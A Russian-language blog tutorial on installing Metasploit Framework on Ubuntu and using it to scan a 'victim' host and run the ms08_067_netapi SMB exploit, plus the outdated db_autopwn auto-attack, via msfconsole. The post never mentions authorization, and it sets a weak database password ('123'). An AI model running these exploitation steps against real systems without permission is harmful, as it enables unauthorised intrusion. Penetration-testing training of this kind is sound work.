Metasploit Framework в Ubuntu

Metasploit Project — проект, посвященный информационной безопасности. Создан для предоставления информации об уязвимостях, помощи в создании сигнатур для IDS, создания и тестирования эксплоитов. Наиболее известен проект Metasploit Framework — удобная платформа для создания и отладки эксплоитов. Кроме того, проект включает в себя базу опкодов, архив шеллкодов и информацию по исследованиям компьютерной безопасности. http://ru.wikipedia.org/wiki/Metasploit
В начале необходимо установить Metasploit Framework. Для этого поставим все необходимые пакеты.
sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems
sudo apt-get install subversion
sudo apt-get build-dep ruby
sudo apt-get install ruby-dev libpcap-dev
sudo apt-get install rubygems libsqlite3-dev
sudo gem install sqlite3-ruby
sudo apt-get install rubygems libmysqlclient-dev
sudo gem install mysql
Далее скачиваем Metasploit Framework вот тут: http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run:
wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run
chmod +x metasploit-latest-linux-installer.run
И запускаем…
sudo ./metasploit-latest-linux-installer.run
После установки необходимо обновить Metasploit Framework
sudo msfupdate
Теперь самый простой вариант использования Metasploit Framework. Запустим консоль.
msfconsole
Теперь добавим нашу жертву в базу данных и информацию про его порты.
db_nmap -sT -sV 192.168.1.1
Отправим все на автоматический взлом =). Данная команда стала неактуальной в последних версиях.
db_autopwn -p -t -e
Если в конце процесса появятся сессии, значит взлом удался. Выбираем сессию и в ходим в нее.
session -i 1
Альтернатив db_autopwn нет. Использовать эксплоиты можно в ручную. Например так:
#Загружаем нужный нам эксплоит
use exploit/windows/smb/ms08_067_netapi
#Смотрим опции
show options
#Заполняем необходимые поля например IP адрес жертвы
set RHOST 192.168.84.58
#Проверяем актуален ли эксплоит для жертвы
check
#Ломаем
exploit
Далее можно заняться многим, все зависит от ваших полномочий в системе. Для просмотра команд доступных Вам наберите:
help
В конце для выхода обратно из сессии и удаления данного хоста из базы данных проделываем следующую операцию:
exit
hosts -d 192.168.1.1
Иногда Базы данных отваливаются я решил данный вопрос вот так:
sudo apt-get install postgresql
sudo apt-get install libpgsql-ruby
sudo su postgres
 createuser root -P
  Enter password for new role: 123
  Enter it again:123
  Shall the new role be a 
   superuser? (y/n) n
  Shall the new role be allowed to 
   create databases? (y/n) n
  Shall the new role be allowed to 
   create more new roles? (y/n) n
 createdb --owner=root metasploit
 exit
msfconsole
 db_connect root:123@127.0.0.1/metasploit

Комментарии

Популярные сообщения из этого блога

S.M.A.R.T. (часть 3). Расшифровка и понимание SMART атрибутов

S.M.A.R.T. (часть 2). Мониторинг BBU RAID контроллеров

Работаем с RAID в Debian на HP Proliant DL580